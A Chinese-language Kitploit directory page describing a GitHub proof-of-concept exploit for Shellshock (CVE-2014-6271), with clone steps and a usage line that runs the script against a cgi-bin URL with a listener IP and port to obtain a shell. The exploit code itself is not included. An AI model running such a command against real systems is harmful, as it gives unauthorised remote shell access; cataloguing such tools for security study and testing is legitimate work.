Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/alissonfaoli/shellshock
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubalissonfaoli/shellshock

Shellshock

Shellshock 漏洞利用 (CVE-2014-6271)

查看仓库
12年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Shellshock 漏洞利用 (CVE-2014-6271)

漏洞利用

描述

该仓库包含针对影响 Unix 系统的漏洞的利用代码。请注意,这仅是一个用于教育目的的概念验证脚本,应负责任地使用。

此利用代码旨在演示 Shellshock 攻击的工作原理,以及如何通过恶意构造的请求头获取系统 shell 访问权限。

免责声明

此仓库仅用于教育目的。请勿将此代码或其中包含的任何信息用于恶意目的。始终遵守道德准则并尊重法律。

使用方法:

python3 shellshock.py [目标 URL] [本机 IP] [本机端口]

示例:

python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234

先决条件:

  • 本地开发环境
  • 已安装 Python

运行此利用代码的步骤如下:

将本仓库克隆到本地机器。

git clone https://github.com/AlissonFaoli/Shellshock.git

进入项目目录。

cd Shellshock

运行 shellshock.py 脚本。

python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi 监听接口IP 监听端口
请记住,此利用代码绝不应针对您未获授权测试的真实软件或系统使用。未经授权的访问或任何恶意行为均属违法。

许可证

此利用代码根据 MIT 许可证发布。您可以在 LICENSE 文件中找到更多信息。

作者:Alisson Faoli

Github:https://github.com/AlissonFaoli

LinkedIn:https://linkedin.com/in/alisson-faoli

如果您对此利用代码有任何问题或疑虑,请随时联系作者

下载工具